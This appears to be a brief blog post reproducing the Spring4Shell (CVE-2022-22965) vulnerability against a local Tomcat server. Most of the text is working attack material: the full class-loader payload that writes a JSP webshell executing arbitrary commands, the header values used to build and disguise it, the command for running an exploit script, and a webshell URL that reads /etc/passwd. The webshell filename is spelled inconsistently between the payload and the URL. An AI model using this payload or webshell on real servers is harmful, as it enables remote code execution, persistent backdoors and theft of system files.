Spring4Shell Hype Train…


CVE-2022-22965 - Reproducing the vulnerability…Someone posted these steps on twitter..lost the original gist

Steps:



digging into the decoded payload is interesting:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i&
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&
class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="


you’ll notice the %{c2}i or the %{suffix}i} in the payload, it seems to be doing some header replacement on the payload body…pretty neat for evasion.

headers = {"suffix":"%>//",
            "c1":"Runtime",
            "c2":"<%",
            "DNT":"1",
            "Content-Type":"application/x-www-form-urlencoded"
}


now we’ve inspected the exploit, run the exploit code: python3 exploit.py --url http://localhost:8080/stupidRumor_war/index to confirm it has worked navigate to: http://localhost:8080/stupidRumor_war/tomcarwar.jsp?pwd=j&cmd=cat%20/etc/passwd
screen shot of /etc/passwd using this mentioned webshell…notice the log lines..
/etc/passwd
I found these repos to be helpful:


I have the decompiled WARs laying around somewhere ill see if i can get them up soon and update the post